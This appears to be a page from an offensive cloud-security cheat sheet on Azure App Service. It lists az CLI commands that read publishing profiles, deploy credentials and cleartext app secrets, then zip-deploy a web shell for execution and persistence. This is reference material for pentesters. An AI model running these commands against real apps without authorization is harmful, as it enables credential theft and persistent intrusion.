App Service publishing credentials authenticate code deploys over msdeploy, FTP, and the SCM site. With Microsoft.Web/sites/publishxml/action (Contributor includes it), the publishing profile is readable and hands over the deploy username, password, and endpoints, which is enough to push a web shell and to read the app's configuration.
Reading the publishing profile#
# full profile with msdeploy/FTP credentials
az webapp deployment list-publishing-profiles -g <rg> -n <app> --xml
# the SCM site-level credentials
az webapp deployment list-publishing-credentials -g <rg> -n <app> \
--query '{user:publishingUserName,pass:publishingPassword}'
# app settings and connection strings in cleartext
az webapp config appsettings list -g <rg> -n <app>
az webapp config connection-string list -g <rg> -n <app>
Deploying a web shell#
# zip-deploy a handler that runs in the app context
az webapp deploy -g <rg> -n <app> --src-path shell.zip --type zip
Exploitation notes#
- The publishing password authenticates to Kudu/SCM directly, so a recovered profile is a shell.
appsettings/connection-string listreturn secrets in cleartext unless Key Vault references are used; even then the reference target is disclosed.- A pushed package persists until redeployed, so this is both execution and persistence.
Tools#
- Azure CLI (
az webapp deployment,az webapp config,az webapp deploy). - MicroBurst (
Get-AzPasswords): bulk publishing-profile and app-setting extraction.